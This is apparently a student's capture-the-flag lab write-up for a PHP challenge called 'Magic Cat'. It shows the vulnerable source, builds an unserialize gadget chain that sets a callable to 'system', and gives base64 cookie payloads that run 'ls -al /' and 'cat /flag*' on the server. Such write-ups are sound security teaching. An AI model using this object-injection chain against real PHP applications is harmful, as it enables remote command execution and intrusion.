Simple Web 0x18(Lab - Magic Cat)

Posted on | Post modified | In |

Simple Web 0x18(Lab - Magic Cat)

tags: NTUSTWS CTF Web

Challenge: http://h4ck3r.quest:8602/

Source code

:::spoiler code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
 
<?php
isset($_GET['source']) && die(!show_source(__FILE__));

class Magic
{
    function cast($spell)
    {
        echo "<script>alert('MAGIC, $spell!');</script>";
    }
}

// Useless class?
class Caster
{
    public $cast_func = 'intval';
    function cast($val)
    {
        return ($this->cast_func)($val);
    }
}

class Cat
{
    public $magic;
    public $spell;
    function __construct($spell)
    {
        $this->magic = new Magic();
        $this->spell = $spell;
    }
    function __wakeup()
    {
        echo "Cat Wakeup!\n";
        $this->magic->cast($this->spell);
    }
}

if (isset($_GET['spell'])) {
    $cat = new Cat($_GET['spell']);
} else if (isset($_COOKIE['cat'])) {
    echo "Unserialize...\n";
    $cat = unserialize(base64_decode($_COOKIE['cat']));
} else {
    $cat = new Cat("meow-meow-magic");
}
?>
<pre>
This is your 🐱:
<?php var_dump($cat) ?>
</pre>

<p>Usage:</p>
<p>/?source</p>
<p>/?spell=the-spell-of-your-cat</p>

Description & Analyze

Exploit - unserialize

  1. Test payload in local side 
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    		 
     $ ./psysh
 > class Caster
 . {
 .     public $cast_func = 'intval';
 .     function cast($val)
 .     {
 .         return ($this->cast_func)($val);
 .     }
 . }
 > $test = new Caster
 = Caster {#2772
     +cast_func: "intval",
   }

 > $test->cast_func = 'system'
 = "system"
 > $test->cast('pwd')
 = "/home/sbk6401"
  2. Construct serialized session 
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    		 
     > class Cat
 . {
 .     public $magic;
 .     public $spell;
 .     function __construct($spell)
 .     {
 .         $this->spell = $spell;
 .         $this->magic = new Caster();
 .     }
 .     function __wakeup()
 .     {
 .         echo "Cat Wakeup!\n";
 .         $this->magic->cast($this->spell);
 .     }
 . }
 > $cat = new Cat("ls -al /")
 = Cat {#2771
     +magic: Caster {#2763
       +cast_func: "intval",
     },
     +spell: "ls -al /",
   }
 > $cat->magic->cast_func = "system"
 = "system"
 > base64_encode(serialize($cat))
 = "TzozOiJDYXQiOjI6e3M6NToibWFnaWMiO086NjoiQ2FzdGVyIjoxOntzOjk6ImNhc3RfZnVuYyI7czo2OiJzeXN0ZW0iO31zOjU6InNwZWxsIjtzOjg6ImxzIC1hbCAvIjt9"

  3. Get flag 
    1
    2
    3
    4
    5
    		 
     > $cat->spell = "cat /flag*"
 = "cat /flag*"

 > base64_encode(serialize($cat))
 = "TzozOiJDYXQiOjI6e3M6NToibWFnaWMiO086NjoiQ2FzdGVyIjoxOntzOjk6ImNhc3RfZnVuYyI7czo2OiJzeXN0ZW0iO31zOjU6InNwZWxsIjtzOjEwOiJjYXQgL2ZsYWcqIjt9"

Flag: FLAG{magic_cat_pwnpwn}

Reference